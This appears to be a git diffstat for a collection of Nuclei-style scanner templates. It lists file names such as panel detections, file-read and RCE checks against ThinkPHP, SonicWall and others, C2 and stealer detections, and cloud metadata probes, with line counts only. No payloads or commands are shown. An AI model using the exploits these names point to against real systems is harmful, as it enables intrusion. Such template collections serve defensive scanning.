poc/other/buddy-panel-797.yaml | 30 - poc/other/buddy-panel.yaml | 20 +- poc/other/buddy-panel.yml | 26 + ...ti-panel-829.yaml => cacti-panel-828.yaml} | 0 .../cacti-weathermap-file-write-832.yaml | 22 + .../cacti-weathermap-file-write-833.yaml | 26 - poc/other/cacti-weathermap-file-write.yaml | 13 +- poc/other/calendly.yaml | 14 +- poc/other/campaignmonitor-841.yaml | 20 - poc/other/campaignmonitor-842.yaml | 21 + poc/other/campaignmonitor.yaml | 3 +- poc/other/can-i-take-over-dns-852.yaml | 140 + 
poc/other/cerebro-panel-878.yaml | 22 - poc/other/cerebro-panel-881.yaml | 27 + poc/other/certificate-validation-882.yaml | 13 - poc/other/certificate-validation-884.yaml | 12 + poc/other/certificate-validation.yaml | 1 + poc/other/cgi-printenv-885.yaml | 5 +- poc/other/cgi-printenv.yaml | 30 + ...t-page-888.yaml => cgi-test-page-887.yaml} | 0 poc/other/cgi-test-page-890.yaml | 8 +- poc/other/checkmarx-panel-895.yaml | 5 +- poc/other/checkpoint-panel-898.yaml | 29 - poc/other/checkpoint-panel-899.yaml | 58 +- poc/other/checkpoint-panel.yaml | 70 +- poc/other/circarlife-setup-917.yaml | 2 +- poc/other/circarlife-setup-918.yaml | 28 + poc/other/circarlife-setup-920.yaml | 37 - poc/other/circarlife-setup-921.yaml | 17 +- poc/other/citrix-oob-memory-read.yaml | 38 + ...aml => clearpass-policy-manager-1001.yaml} | 0 ...1007.yaml => clientaccesspolicy-1005.yaml} | 0 poc/other/clientaccesspolicy.yaml | 54 +- poc/other/cloudinary.yaml | 12 +- poc/other/cloudphysician-radar.yaml | 20 +- poc/other/codeigniter-env.yaml | 6 +- poc/other/cofense-vision-panel-1141.yaml | 27 - poc/other/cofense-vision-panel-1142.yaml | 28 + poc/other/cofense-vision-panel.yaml | 15 +- poc/other/cold-fusion-cfcache-map.yaml | 56 +- poc/other/concourse-ci-panel.yaml | 12 +- poc/other/contacam-1197.yaml | 19 +- poc/other/contacam-1198.yaml | 22 +- poc/other/contact-form-7.yaml | 48 - poc/other/content-scheme.yaml | 15 +- poc/other/crossdomain-xml-1267.yaml | 29 + poc/other/csod-panel-1286.yaml | 20 + poc/other/cucm-username-enumeration.yaml | 8 +- poc/other/custom_nuclei-2.yaml | 10 +- poc/other/custom_nuclei-3.yaml | 44 + poc/other/d-link-arbitary-fileread-7043.yaml | 27 + poc/other/d-link-arbitary-fileread-7044.yaml | 21 - poc/other/d-link-wireless-7047.yaml | 23 - poc/other/d-link-wireless-7048.yaml | 6 +- poc/other/dead-host-with-cname-6786.yaml | 23 - poc/other/deimos-c2.yaml | 33 + poc/other/deprecated-tls-6958.yaml | 19 +- poc/other/deprecated-tls.yaml | 27 +- 
poc/other/development-logs-6989.yaml | 40 - ...fileread(1).yaml => diaowen-fileread.yaml} | 0 poc/other/dir-listing-7003.yaml | 19 + poc/other/dir-listing-7005.yaml | 8 +- poc/other/dlink-850l-info-leak-7035.yaml | 37 + poc/other/dlink-850l-info-leak-7037.yaml | 6 +- poc/other/dlink-850l-info-leak-7039.yaml | 29 + poc/other/dlink-file-read.yaml | 40 +- poc/other/dokuwiki-panel.yaml | 28 - poc/other/domcfg-page-7076.yaml | 8 +- poc/other/domcfg-page.yaml | 12 +- poc/other/drone-ci-panel-7091.yaml | 27 + poc/other/drone-ci-panel.yaml | 19 +- poc/other/dropbox.yaml | 13 +- poc/other/druid-monitor-7100.yaml | 2 +- poc/other/druid-monitor-7102.yaml | 22 + poc/other/druid-monitor-7103.yaml | 18 - poc/other/druid-monitor.yaml | 10 +- poc/other/ds-store-file.yaml | 36 + poc/other/dss-download-fileread-7117.yaml | 16 +- poc/other/dss-download-fileread.yaml | 20 + poc/other/dxplanning-panel.yaml | 37 - ...l => dynamic-broadcast-receiver-7141.yaml} | 0 poc/other/dynamic-broadcast-receiver.yaml | 38 +- .../easy-media-gallery-pro-listing-7152.yaml | 22 + .../easy-media-gallery-pro-listing-7153.yaml | 49 +- poc/other/ecology-getshell.yaml | 6 +- poc/other/emerson-power-panel.yaml | 14 +- poc/other/entrust-identityguard.yaml | 23 +- poc/other/{Bitrix_check_env.yaml => env.yaml} | 0 poc/other/envision-gateway-7227.yaml | 10 +- poc/other/envision-gateway.yaml | 22 - poc/other/error-logs-7254.yaml | 48 +- poc/other/error-logs-7255.yaml | 61 + poc/other/example-template.yaml | 8 +- poc/other/f-secure-policy-manager-7560.yaml | 23 + poc/other/f-secure-policy-manager-7564.yaml | 7 +- ...436.yaml => fatpipe-ipvpn-panel-7435.yaml} | 0 poc/other/fatpipe-ipvpn-panel.yaml | 20 +- ...scheme-7468.yaml => file-scheme-7467.yaml} | 0 poc/other/filezilla-7470.yaml | 35 + poc/other/filezilla-7471.yaml | 1 + poc/other/fiorilaunchpad-logon.yaml | 16 +- poc/other/firebase-urls-7497.yaml | 8 +- poc/other/firebase-urls-7499.yaml | 10 +- poc/other/flightpath-panel.yaml | 12 +- poc/other/formula.yaml | 
59 + poc/other/fortimail-panel-7532.yaml | 6 +- poc/other/fortimail-panel.yaml | 18 +- poc/other/fortinet-fortigate-panel-7536.yaml | 20 - .../foulenzer-subdomain-tk (copy 1).yaml | 183 - poc/other/foulenzer-subdomain-tk.yaml | 210 +- poc/other/gespage-panel-7605.yaml | 34 - poc/other/gespage-panel-7606.yaml | 34 + poc/other/gespage-panel.yaml | 12 +- poc/other/globalprotect-panel-7720.yaml | 21 - poc/other/glpi-directory-listing-7734.yaml | 34 - poc/other/glpi-directory-listing.yaml | 30 + poc/other/glpidirectorylisting(1).yaml | 47 - poc/other/glpidirectorylisting.yaml | 103 +- poc/other/go-anywhere-client.yaml | 19 +- poc/other/gogs-workflow-7760.yaml | 11 + poc/other/gogs-workflow.yaml | 11 - poc/other/goodjob-dashboard.yaml | 35 + poc/other/gradle-enterprise-panel-7800.yaml | 14 +- poc/other/gradle-enterprise-panel.yaml | 28 +- poc/other/grafana-file-read-7810.yaml | 17 +- poc/other/grafana-file-read-7812.yaml | 6 - poc/other/h2console-panel-7866.yaml | 24 - poc/other/h2console-panel.yaml | 18 +- poc/other/hack5-cloud-c2.yaml | 32 - poc/other/haivision-gateway-panel.yaml | 27 + poc/other/hanming-lfr-7879.yaml | 7 +- poc/other/hanming-lfr.yaml | 33 - poc/other/haproxy-status-7883.yaml | 19 +- ...orkflow-7889.yaml => harbor-workflow.yaml} | 0 poc/other/heatmiser-wifi-thermostat-7923.yaml | 20 +- poc/other/heatmiser-wifi-thermostat.yaml | 21 - poc/other/hikvision-info-leak-7958.yaml | 34 - poc/other/hikvision-info-leak.yaml | 21 + poc/other/hitron-technologies-7961.yaml | 25 + poc/other/hitron-technologies-7962.yaml | 24 - poc/other/hitron-technologies.yaml | 18 +- .../hjtcloud-arbitrary-file-read-7967.yaml | 37 - poc/other/hjtcloud-arbitrary-file-read.yaml | 9 +- ...jtcloud-rest-arbitrary-file-read-7975.yaml | 9 +- ...=> hjtcloud-rest-arbitrary-file-read.yaml} | 0 poc/other/hmc-hybris-panel-7977.yaml | 19 - poc/other/hmc-hybris-panel-7978.yaml | 19 + poc/other/hmc-hybris-panel.yaml | 13 +- .../honeywell-building-control-7987.yaml | 24 + 
.../honeywell-building-control-7988.yaml | 24 - ...{hp-ilo-5-8021.yaml => hp-ilo-5-8018.yaml} | 0 poc/other/hp-ilo-5-8020.yaml | 33 + poc/other/hp-service-manager-8032.yaml | 20 - poc/other/hp-service-manager-8034.yaml | 24 + poc/other/hp-service-manager.yaml | 6 +- .../hpe-system-management-anonymous-8013.yaml | 21 - poc/other/huawei-hg532e-panel-8065.yaml | 4 +- poc/other/huawei-hg532e-panel-8066.yaml | 30 - poc/other/huawei-hg532e-panel.yaml | 21 +- poc/other/hubspot.yaml | 29 +- poc/other/huijietong-cloud-fileread-8085.yaml | 23 +- poc/other/huijietong-cloud-fileread.yaml | 31 + poc/other/identity-services-engine-8146.yaml | 21 - ...dentityguard-selfservice-entrust-8142.yaml | 21 - poc/other/immich-panel.yaml | 37 - poc/other/interactsh-server-8165.yaml | 35 - poc/other/interactsh-server.yaml | 20 + poc/other/interlib-fileread-8171.yaml | 8 +- poc/other/interlib-fileread-8173.yaml | 2 +- poc/other/internet-service-8178.yaml | 20 + poc/other/internet-service.yaml | 22 - poc/other/iomega-emc-shared-nas.yaml | 18 +- poc/other/ioncube-loader-wizard-8185.yaml | 10 +- ...d-8184.yaml => ioncube-loader-wizard.yaml} | 0 poc/other/ipstack.yaml | 12 +- poc/other/iptime-router.yaml | 21 +- ...p-panel-8204.yaml => itop-panel-8205.yaml} | 0 poc/other/itop-panel.yaml | 16 +- poc/other/ixcache-panel.yaml | 22 +- poc/other/jaeger-ui-dashboard.yaml | 9 +- poc/other/jamf-panel-8215.yaml | 6 +- poc/other/jamf-panel-8216.yaml | 28 - poc/other/jamf-panel.yaml | 21 +- poc/other/jfrog-8306.yaml | 20 - poc/other/jfrog.yaml | 19 +- poc/other/jkstatus-manager-8344.yaml | 18 - poc/other/jkstatus-manager-8347.yaml | 30 +- poc/other/jmx-console-8351.yaml | 16 + poc/other/jmx-console-8352.yaml | 15 - .../{jolokia-8367.yaml => jolokia-8369.yaml} | 0 poc/other/jolokia-list-8360.yaml | 28 - poc/other/jolokia-list-8361.yaml | 27 + poc/other/jolokia-list.yaml | 12 +- poc/other/jumpcloud.yaml | 11 +- poc/other/kerio-connect-client-8452.yaml | 2 +- poc/other/kerio-connect-client.yaml | 18 +- 
poc/other/kingsoft-v8-file-read-8491.yaml | 6 +- poc/other/kingsoft-v8-file-read.yaml | 34 + poc/other/kubelet-healthz-8518.yaml | 1 - poc/other/kubelet-healthz.yaml | 34 + poc/other/kubelet-pods-8522.yaml | 1 - poc/other/kubelet-pods-8523.yaml | 22 + ...570.yaml => landray-oa-fileread-8571.yaml} | 0 poc/other/leostream-panel-8610.yaml | 16 +- poc/other/leostream-panel.yaml | 19 +- poc/other/liveview-axis-camera-8648.yaml | 51 + poc/other/lockself-panel.yaml | 28 - poc/other/lokalise.yaml | 28 +- poc/other/lotus-domino-version-8656.yaml | 6 +- poc/other/lotus-domino-version-8657.yaml | 34 - poc/other/lotus-domino-version.yaml | 30 + ...-8669.yaml => lucee-stack-trace-8668.yaml} | 0 poc/other/mailgun.yaml | 26 +- poc/other/manageengine-adaudit-8730.yaml | 34 + poc/other/manageengine-adaudit.yaml | 32 +- .../manageengine-adselfservice-8736.yaml | 4 +- .../manageengine-adselfservice-8738.yaml | 7 +- .../manageengine-apex-helpdesk-8746.yaml | 24 - .../manageengine-apex-helpdesk-8748.yaml | 19 + poc/other/manageengine-apex-helpdesk.yaml | 19 +- ...anageengine-applications-manager-8751.yaml | 24 - ...anageengine-applications-manager-8753.yaml | 19 + .../manageengine-applications-manager.yaml | 18 +- .../manageengine-assetexplorer-8757.yaml | 3 +- .../manageengine-assetexplorer-8758.yaml | 19 - poc/other/manageengine-assetexplorer.yaml | 20 +- poc/other/manageengine-desktop-8761.yaml | 4 +- poc/other/manageengine-desktop-8763.yaml | 19 - poc/other/manageengine-desktop.yaml | 19 +- poc/other/manageengine-opmanager-8767.yaml | 26 + poc/other/manageengine-opmanager-8768.yaml | 19 - ...aml => manageengine-servicedesk-8771.yaml} | 0 .../manageengine-supportcenter-8776.yaml | 4 +- .../manageengine-supportcenter-8777.yaml | 19 - poc/other/{get.yaml => match-1.yaml} | 0 ...her-with-or.yaml => matcher-with-and.yaml} | 0 poc/other/meduza-stealer.yaml | 32 - poc/other/memcached-stats.yaml | 15 +- poc/other/metadata-alibaba-8807.yaml | 39 + poc/other/metadata-alibaba-8809.yaml | 14 
+- poc/other/metadata-azure-8813.yaml | 42 - poc/other/metadata-azure.yaml | 42 + poc/other/metadata-hetzner-8822.yaml | 42 + poc/other/metadata-hetzner.yaml | 10 +- poc/other/metadata-openstack-8827.yaml | 21 +- poc/other/metadata-openstack-8828.yaml | 10 +- poc/other/metadata-service-alibaba.yaml | 60 +- poc/other/mikrotik-graph-8870.yaml | 20 - poc/other/mikrotik-graph-8871.yaml | 20 + poc/other/mikrotik-routeros.yaml | 52 +- poc/other/mini-start-page-8895.yaml | 21 + poc/other/mini-start-page-8896.yaml | 22 - poc/other/mini-start-page.yaml | 19 +- poc/other/mobileiron-sentry.yaml | 32 + poc/other/mobotix-guest-camera-8910.yaml | 20 - poc/other/mobotix-guest-camera-8911.yaml | 19 +- poc/other/moodle-changelog.yaml | 17 +- poc/other/moodle-workplace-panel.yaml | 28 + poc/other/mx-fingerprint-8973.yaml | 22 +- poc/other/mx-fingerprint.yaml | 22 + poc/other/mystic-stealer.yaml | 27 + poc/other/nameserver-fingerprint-8998.yaml | 19 +- poc/other/nameserver-fingerprint.yaml | 22 + poc/other/navicat-server-panel.yaml | 39 - poc/other/neos-panel-9015.yaml | 3 +- poc/other/neos-panel.yaml | 22 +- ...panel-9020.yaml => nessus-panel-9017.yaml} | 0 poc/other/nessus-panel-9019.yaml | 7 +- poc/other/netflix-conductor-ui.yaml | 27 +- poc/other/netflix-conductor-version.yaml | 37 +- poc/other/netis-info-leak-9036.yaml | 8 +- poc/other/netis-info-leak.yaml | 30 + poc/other/netrc-9045.yaml | 19 +- poc/other/netscaler-gateway-9052.yaml | 23 - poc/other/netscaler-gateway.yaml | 15 +- poc/other/nextcloud-install-9084.yaml | 25 + poc/other/nextcloud-install-9085.yaml | 28 - poc/other/nexus-panel.yaml | 35 + poc/other/nh-c2.yaml | 28 - poc/other/ns-asg-file-read-9153.yaml | 24 - poc/other/ns-asg-file-read.yaml | 36 - poc/other/ntlm-directories-9155.yaml | 118 +- poc/other/ntlm-directories-9156.yaml | 119 +- poc/other/nuuo-file-inclusion-9169.yaml | 20 +- poc/other/officedocuments.yaml | 11 +- poc/other/oki-data-9223.yaml | 19 + poc/other/oki-data-9226.yaml | 20 - 
poc/other/oki-data.yaml | 19 +- poc/other/okiko-sfiler-portal-9227.yaml | 32 + ...a-panel-9231.yaml => okta-panel-9234.yaml} | 0 poc/other/old-copyright-9237.yaml | 45 - poc/other/old-copyright-9238.yaml | 3 +- poc/other/one_line_checks_nuclei.yaml | 16 +- poc/other/onliner-multiple-bugs.yaml | 62 +- .../oob-param-based-interaction-9252.yaml | 26 + poc/other/oob-param-based-interaction.yaml | 19 - poc/other/open-mjpg-streamer-9282.yaml | 11 +- poc/other/open-mjpg-streamer-9284.yaml | 26 - poc/other/open-proxy-internal-9289.yaml | 111 - poc/other/open-proxy-internal-9290.yaml | 134 + poc/other/open-proxy-portscan-9295.yaml | 62 + poc/other/open-proxy-portscan-9296.yaml | 6 +- poc/other/open-proxy-portscan.yaml | 13 +- ...pen-virtualization-manager-panel-9328.yaml | 33 + .../open-virtualization-manager-panel.yaml | 16 +- poc/other/openam-workflow.yaml | 11 + poc/other/opensis-workflow-9318.yaml | 11 + ...rkflow-9319.yaml => opensis-workflow.yaml} | 0 .../opentouch-multimediaservices-panel.yaml | 46 - poc/other/overseerr-panel.yaml | 34 + .../pacs-connexion-utilisateur-9425.yaml | 24 - poc/other/pacs-connexion-utilisateur.yaml | 20 +- poc/other/pagerduty.yaml | 16 +- poc/other/pagespeed-global-admin-9433.yaml | 29 + poc/other/pagespeed-global-admin-9435.yaml | 33 - poc/other/pagespeed-global-admin.yaml | 8 +- poc/other/pahtool-panel.yaml | 35 - poc/other/panabit-panel-9444.yaml | 24 + poc/other/panabit-panel-9445.yaml | 25 - .../panasonic-network-management-9447.yaml | 20 - .../panasonic-network-management-9448.yaml | 21 + .../panasonic-network-management-9449.yaml | 5 +- poc/other/parallels-html-client-9464.yaml | 16 +- poc/other/passbolt-panel.yaml | 35 + poc/other/pdi-device-page.yaml | 31 + poc/other/pendo.yaml | 17 +- ...anel-9483.yaml => pentaho-panel-9481.yaml} | 0 poc/other/pivotaltracker.yaml | 15 +- poc/other/plausible-panel.yaml | 35 + poc/other/plesk-obsidian-9594.yaml | 24 - poc/other/plesk-obsidian-9597.yaml | 3 +- ...sk-onyx-9598.yaml => 
plesk-onyx-9601.yaml} | 0 poc/other/plesk-onyx.yaml | 6 +- poc/other/plesk-stat-9604.yaml | 43 - poc/other/plesk-stat.yaml | 28 + poc/other/plugin.yaml | 49 + poc/other/portainer-init-deploy-9633.yaml | 24 +- ...y-9630.yaml => portainer-init-deploy.yaml} | 0 poc/other/posteio-admin-panel.yaml | 31 - .../postmessage-outgoing-tracker-9634.yaml | 66 - poc/other/postmessage-outgoing-tracker.yaml | 63 + poc/other/postmessage-tracker-9637.yaml | 57 +- poc/other/postmessage-tracker-9639.yaml | 47 +- poc/other/powerlogic-ion-9648.yaml | 19 - poc/other/powerlogic-ion-9650.yaml | 20 + poc/other/powerlogic-ion.yaml | 24 +- poc/other/printers-info-leak.yaml | 15 +- ...678.yaml => prometheus-exporter-9677.yaml} | 0 poc/other/prometheus-exporter.yaml | 26 + poc/other/prometheus-flags-9687.yaml | 42 + poc/other/prometheus-flags.yaml | 31 - poc/other/prometheus-targets-9691.yaml | 38 - poc/other/prototype-pollution-check-9698.yaml | 95 + poc/other/prototype-pollution-check-9699.yaml | 95 - poc/other/prototype-pollution-check.yaml | 134 +- ...path-9702.yaml => provider-path-9701.yaml} | 0 poc/other/ptr-fingerprint-9707.yaml | 19 +- poc/other/ptr-fingerprint.yaml | 22 + poc/other/pulse-secure-panel-9712.yaml | 19 + poc/other/pulse-secure-panel-9715.yaml | 27 +- ...-enb.yaml => put-method-enabled-9727.yaml} | 0 poc/other/put-method-enabled.yaml | 25 - poc/other/pypicloud-panel-9733.yaml | 24 + poc/other/pypicloud-panel.yaml | 19 +- poc/other/qdpm-info-leak-9753.yaml | 27 + poc/other/qdpm-info-leak.yaml | 31 + poc/other/qualcomm-voip-router.yaml | 18 +- .../{race-multiple.yaml => race-simple.yaml} | 0 poc/other/radius-manager-9794.yaml | 22 + poc/other/radius-manager-9796.yaml | 22 - poc/other/rancher-panel.yaml | 31 +- .../{get-override-sni.yaml => raw-get.yaml} | 0 poc/other/red-lion-panel.yaml | 26 + poc/other/request-based-interaction-9862.yaml | 56 + ...63.yaml => request-based-interaction.yaml} | 0 poc/other/resin-inputfile-fileread-9868.yaml | 21 - 
poc/other/resin-inputfile-fileread-9870.yaml | 22 + poc/other/resin-inputfile-fileread-9871.yaml | 1 - poc/other/resin-viewfile-lfr.yaml | 27 + poc/other/robots-txt-9888.yaml | 28 + poc/other/robots-txt-9890.yaml | 23 - poc/other/rsa-self-service.yaml | 19 +- poc/other/ruijie-EG-fileDown.yaml | 2 - poc/other/ruijie-eg-filedown.yaml | 24 + ...8.yaml => scs-landfill-control-10097.yaml} | 0 poc/other/securenvoy-panel-10114.yaml | 19 - poc/other/securenvoy-panel-10116.yaml | 19 + poc/other/securepoint-utm-10117.yaml | 27 - poc/other/securepoint-utm-10118.yaml | 32 + poc/other/security-10123.yaml | 25 - poc/other/security-10124.yaml | 23 + poc/other/security-txt.yaml | 2 + poc/other/selea-ip-camera-10136.yaml | 30 - poc/other/selfcheck-panel.yaml | 33 + poc/other/sendgrid.yaml | 6 +- poc/other/server-status-localhost-10163.yaml | 14 +- poc/other/server-status-localhost-10165.yaml | 28 - poc/other/server-status-localhost-10166.yaml | 22 + poc/other/servfail-refused-hosts-10167.yaml | 9 +- poc/other/servfail-refused-hosts-10170.yaml | 16 +- poc/other/shell-history-10192.yaml | 28 +- ...-history-10193.yaml => shell-history.yaml} | 0 poc/other/shellscripts.yaml | 28 +- poc/other/short-io.yaml | 15 +- poc/other/sidekiq-dashboard-10235.yaml | 19 - poc/other/sidekiq-dashboard-10239.yaml | 22 + poc/other/signatures-10248.yaml | 52090 ++++++++++- poc/other/signatures-10268.yaml | 2170 + poc/other/signatures.yaml | 75682 +++++++++++++++- poc/other/sitemap.yaml | 40 - ...4.yaml => skycaiji-admin-panel-10306.yaml} | 0 poc/other/slack.yaml | 10 +- poc/other/softether-vpn-panel.yaml | 30 - poc/other/solarwinds-orion-10357.yaml | 17 + poc/other/solarwinds-orion-10359.yaml | 15 - poc/other/solarwinds-orion.yaml | 16 +- poc/other/solr-fileRead.yaml | 5 +- poc/other/solr-fileread.yaml | 33 + poc/other/solr-query-dashboard-10368.yaml | 25 + poc/other/solr-query-dashboard.yaml | 20 - ...l => sonarqube-public-projects-10377.yaml} | 0 poc/other/sonicwall-management-panel.yaml | 16 +- ...yaml 
=> sonicwall-sslvpn-panel-10388.yaml} | 0 poc/other/sonicwall-sslvpn-panel.yaml | 24 +- .../sonicwall-sslvpn-shellshock-10394.yaml | 20 +- .../sonicwall-sslvpn-shellshock-10395.yaml | 27 + poc/other/sphinxonline-panel.yaml | 43 + ...spidercontrol-scada-server-info-10411.yaml | 9 +- ...spidercontrol-scada-server-info-10413.yaml | 38 - poc/other/splunk-enterprise-panel-10415.yaml | 31 - .../spoofable-spf-records-ptr-10424.yaml | 19 + .../spoofable-spf-records-ptr-10425.yaml | 16 - poc/other/square.yaml | 16 +- ...squid-analysis-report-generator-10513.yaml | 5 +- poc/other/sugarcrm-panel.yaml | 8 +- poc/other/supershell-c2.yaml | 34 - poc/other/supervpn-panel-10577.yaml | 27 - .../symantec-messaging-gateway-10607.yaml | 7 +- .../symantec-messaging-gateway-10610.yaml | 19 - .../symantec-pgp-global-directory-10611.yaml | 21 + poc/other/symantec-pgp-global-directory.yaml | 19 +- poc/other/symfony-profiler-10628.yaml | 4 +- poc/other/symfony-profiler.yaml | 29 +- poc/other/synopsys-coverity-panel.yaml | 36 - poc/other/tableau-panel.yaml | 18 +- poc/other/tabnabbing-check-10646.yaml | 22 + .../teamcity-registration-enabled-10667.yaml | 34 - poc/other/teamcity-registration-enabled.yaml | 30 + poc/other/teamforge-panel.yaml | 43 + poc/other/tectuus-scada-monitor.yaml | 16 +- poc/other/tekon-info-leak-10684.yaml | 8 +- poc/other/tekon-info-leak-10685.yaml | 40 + poc/other/teradici-pcoip-10703.yaml | 7 + poc/other/teradici-pcoip.yaml | 26 - .../terraform-enterprise-panel-10710.yaml | 27 - .../terraform-enterprise-panel-10711.yaml | 27 + poc/other/terraform-enterprise-panel.yaml | 19 +- poc/other/thinfinity-virtualui-panel.yaml | 18 +- poc/other/thinkCMF_include.yaml | 2 + ...inkcmf-arbitrary-code-execution-10715.yaml | 29 - .../thinkcmf-arbitrary-code-execution.yaml | 23 + poc/other/thinkcmf_include.yaml | 22 - poc/other/tianqing-info-leak.yaml | 11 +- poc/other/tibco-spotfire-panel.yaml | 35 + poc/other/tigase-xmpp-server.yaml | 31 + poc/other/tileserver-gl-10786.yaml | 21 +- 
poc/other/tileserver-gl.yaml | 33 + poc/other/tor-socks-proxy-10811.yaml | 29 - poc/other/traefik-dashboard-10832.yaml | 15 - poc/other/traefik-dashboard-10834.yaml | 15 + poc/other/travisci.yaml | 6 +- .../tuxedo-connected-controller-10852.yaml | 20 + .../tuxedo-connected-controller-10855.yaml | 21 - poc/other/tuxedo-connected-controller.yaml | 5 +- poc/other/upnp-device-10981.yaml | 3 +- poc/other/upnp-device-10982.yaml | 39 - poc/other/ups-status-10983.yaml | 20 - poc/other/ups-status-10985.yaml | 21 + poc/other/url.yaml | 41 +- poc/other/veriz0wn-osint.yaml | 29 - ...5.yaml => voipmonitor-workflow-11064.yaml} | 0 poc/other/voipmonitor-workflow.yaml | 11 - poc/other/wago-plc-panel-11091.yaml | 2 +- .../wallix-accessmanager-panel-11094.yaml | 29 - .../wallix-accessmanager-panel-11095.yaml | 30 + poc/other/wallix-accessmanager-panel.yaml | 22 +- poc/other/wazuh-panel-11113.yaml | 33 - poc/other/wazuh-panel-11114.yaml | 34 + poc/other/wazuh-panel.yaml | 10 +- poc/other/weatherlink-11117.yaml | 3 +- poc/other/weatherlink.yaml | 22 +- ...-leakage(1).yaml => wireless-leakage.yaml} | 0 poc/other/woosidebars.yaml | 5 +- poc/other/wooyun-2015-148227(1).yaml | 26 + poc/other/wooyun-2015-148227-11224.yaml | 23 +- poc/other/wooyun-2015-148227-11225.yaml | 2 +- poc/other/wooyun-2015-148227-11228.yaml | 1 + poc/other/workspace-one-uem-11393.yaml | 17 - poc/other/workspace-one-uem-11394.yaml | 16 + poc/other/workspace-one-uem.yaml | 5 +- poc/other/wowza-streaming-engine-11399.yaml | 22 - poc/other/wowza-streaming-engine.yaml | 12 +- poc/other/wso2-2019-0598-11635.yaml | 36 - poc/other/wso2-management-console-11644.yaml | 19 - poc/other/wso2-management-console-11645.yaml | 17 +- poc/other/wso2-management-console-11647.yaml | 30 + poc/other/wso2-management-console.yaml | 36 +- ...mtconsole(1).yaml => wso2mgmtconsole.yaml} | 0 poc/other/xds-amr-status-11669.yaml | 5 + poc/other/xff-403-bypass.yaml | 24 +- poc/other/xprober-service-11694.yaml | 3 +- poc/other/xxljob-panel.yaml | 
18 +- poc/other/yarn-lock-11730.yaml | 5 + poc/other/yarn-lock.yaml | 25 + poc/other/yongyou-ELTextFile.yaml | 2 - poc/other/yongyou-eltextfile.yaml | 23 + poc/other/yopass-panel-11749.yaml | 16 - poc/other/yopass-panel-11750.yaml | 16 + poc/other/yopass-panel.yaml | 15 +- poc/other/zhiyuan-oa-info-leak-11797.yaml | 5 +- poc/other/zhiyuan-oa-info-leak-11799.yaml | 23 + poc/other/zhiyuan-oa-info-leak-11800.yaml | 23 - poc/other/zhongkewangwei-fileread.yaml | 20 + poc/other/zte-panel-11840.yaml | 19 +- poc/other/zuul-panel-11843.yaml | 33 + poc/other/zuul-panel.yaml | 22 +- poc/perl/perl-status-9486.yaml | 17 +- poc/perl/perl-status-9487.yaml | 16 + poc/php/clockwork-php-page-1016.yaml | 31 + poc/php/clockwork-php-page-1019.yaml | 15 +- ...s-9497.yaml => php-backup-files-9498.yaml} | 0 poc/php/php-backup-files.yaml | 127 +- poc/php/php-errors-9511.yaml | 40 - poc/php/php-errors.yaml | 41 - poc/php/php-proxy-detect-9544.yaml | 8 +- poc/php/php-proxy-detect.yaml | 26 - poc/php/php-scanner-9546.yaml | 59 +- poc/php/php-scanner.yaml | 258 + poc/php/php-timeclock-xss-9552.yaml | 19 +- poc/php/php-timeclock-xss-9553.yaml | 45 +- poc/php/php-user-ini-disclosure-9561.yaml | 7 +- ...ml => php-zerodium-backdoor-rce-9572.yaml} | 0 poc/php/php-zerodium-backdoor-rce.yaml | 29 - poc/php/phpcollab-detect-9499.yaml | 21 + poc/php/phpcollab-workflow-9502.yaml | 11 + poc/php/phpcollab-workflow-9503.yaml | 11 - poc/php/phpcollab-workflow.yaml | 2 +- poc/php/phpinfo-9520.yaml | 49 - poc/php/phpldapadmin-panel.yaml | 41 + poc/php/phpmyadmin-panel-9526.yaml | 18 +- poc/php/phpmyadmin-setup-9531.yaml | 36 - poc/php/phpmyadmin-setup-9532.yaml | 30 + poc/php/phpmyadmin-setup-9533.yaml | 14 +- poc/php/phpmyadmin-sql-9534.yaml | 28 - poc/php/phpmyadmin-sql.php-server.yaml | 5 - poc/php/phpunit-9556.yaml | 34 + poc/php/phpunit.yaml | 28 - poc/php/phpwiki-lfi-9567.yaml | 3 +- poc/php/ruijie-phpinfo-9952.yaml | 5 +- poc/php/ruijie-phpinfo-9953.yaml | 3 +- poc/php/thinkphp-2-rce-10740.yaml | 27 - 
poc/php/thinkphp-501-rce-10743.yaml | 39 - poc/php/thinkphp-501-rce.yaml | 24 + poc/php/thinkphp-5022-rce-10744.yaml | 27 + poc/php/thinkphp-5022-rce-10746.yaml | 10 +- ...-rce.yaml => thinkphp-5022-rce-10747.yaml} | 0 poc/php/thinkphp-5023-rce-10748.yaml | 25 - poc/php/thinkphp-5023-rce-10751.yaml | 12 +- ...kphp-509-information-disclosure-10755.yaml | 29 - .../thinkphp-509-information-disclosure.yaml | 14 +- poc/php/twig-php-ssti-10856.yaml | 15 + poc/php/twig-php-ssti-10859.yaml | 1 - poc/php/weiphp-sql-injection-11190.yaml | 11 +- poc/php/wp-phpfreechat-xss-11524.yaml | 24 - poc/php/wp-phpfreechat-xss-11527.yaml | 8 +- poc/php/wp-phpfreechat-xss-11528.yaml | 2 +- poc/python/Django-DebugMode.yaml | 8 +- poc/python/autobahn-python-detect-594.yaml | 30 + poc/python/autobahn-python-detect-595.yaml | 29 - poc/python/default-django-page-6840.yaml | 5 +- poc/python/default-django-page-6841.yaml | 10 +- poc/python/django-admin-panel-7023.yaml | 18 + poc/python/django-admin-panel.yaml | 16 +- poc/python/django-debug-detect.yaml | 12 +- poc/python/django-debug-exposed-404.yaml | 24 + poc/python/django-debug-exposure.yaml | 23 +- .../django-framework-exceptions-7033.yaml | 7 +- poc/python/django-framework-exceptions.yaml | 30 - poc/python/django-secret-key.yaml | 31 - poc/python/django-secret.key.yaml | 62 + poc/python/jupyter-ipython-unauth-8402.yaml | 21 - poc/python/jupyter-ipython-unauth-8405.yaml | 15 +- poc/python/python-metrics-9747.yaml | 10 +- poc/python/python-metrics.yaml | 25 - poc/python/python-scanner-9748.yaml | 57 + poc/python/python-scanner.yaml | 39 - poc/rabbitmq/rabbitmq-dashboard-9776.yaml | 14 - poc/rabbitmq/rabbitmq-dashboard-9779.yaml | 15 + poc/rabbitmq/rabbitmq-default-admin-9780.yaml | 25 + poc/rabbitmq/rabbitmq-default-admin-9782.yaml | 25 - poc/rabbitmq/rabbitmq-default-admin.yaml | 2 - poc/rabbitmq/rabbitmq-default-login-9783.yaml | 12 +- poc/rabbitmq/rabbitmq-default-login-9786.yaml | 12 +- poc/redis/exposed-redis-7339.yaml | 27 + 
